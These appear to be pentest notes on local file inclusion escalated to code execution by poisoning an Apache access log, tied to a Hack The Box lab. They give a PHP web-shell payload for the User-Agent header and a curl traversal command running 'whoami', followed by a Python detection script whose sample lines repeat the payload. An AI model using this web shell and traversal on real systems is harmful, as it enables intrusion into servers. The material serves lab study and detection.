LFI - Using access logs (Log Poisoning)
Steps
- Confirm that the LFI can read the web server's access log
- Send a request with this payload in the User-Agent header, so that it is written to the access log
<?php echo shell_exec($_GET['cmd']);?>
- Include the access log in the next request, passing the command in the cmd parameter
curl 'http://10.10.8.194/?view=../../../../var/log/apache2/access.log&ext=&cmd=whoami'
Reference: [Remote Code Execution With LFI | C:\Helich0pper](https://helich0pper.github.io/LFI/)
References
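
A defender-side check for the chain in the steps above, as an added example (not from these notes or the referenced write-up): it scans Apache combined-format access-log lines for a PHP open tag in client-controlled fields and for requests that point a parameter at a log file. The regexes, function names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" \d{3} \S+ '
    r'"(?P<referer>.*?)" "(?P<agent>.*)"$'
)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)                # PHP open tag written into a log field
LOG_PATH = re.compile(r'\.\./.*\blog\b|/var/log/', re.I)   # traversal or absolute path to a log

def findings(line):
    """Return the set of indicators present in one access-log line."""
    m = COMBINED.match(line)
    if not m:
        return {"unparsed"}  # malformed lines deserve a manual look as well
    found = set()
    # Any client-controlled field that is logged verbatim can carry the tag.
    if any(PHP_TAG.search(unquote(m[f])) for f in ("request", "referer", "agent")):
        found.add("php_tag_in_log")
    # Decode twice so %2f and double-encoded traversal sequences are normalised.
    if LOG_PATH.search(unquote(unquote(m["request"]))):
        found.add("log_file_include")
    return found

def scan(lines):
    """Map each client host to its indicators; both together means the full chain."""
    per_host = {}
    for line in lines:
        m = COMBINED.match(line)
        hits = findings(line)
        if hits:
            per_host.setdefault(m["host"] if m else "?", set()).update(hits)
    return per_host

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = '''\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo shell_exec($_GET['cmd']);?>"
203.0.113.9 - - [10/Oct/2023:13:56:09 +0000] "GET /?view=../../../../var/log/apache2/access.log&ext=&cmd=whoami HTTP/1.1" 200 2048 "-" "curl/7.88.1"
198.51.100.7 - - [10/Oct/2023:14:02:11 +0000] "GET /?view=..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log&ext= HTTP/1.1" 200 2048 "-" "curl/7.88.1"
'''.splitlines()

if __name__ == "__main__":
    for host, hits in scan(SAMPLE).items():
        print(host, sorted(hits))
```

A host that shows both indicators has written a PHP tag into the log and then requested the log through the vulnerable parameter, which is the sequence the steps describe.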
- HTB bart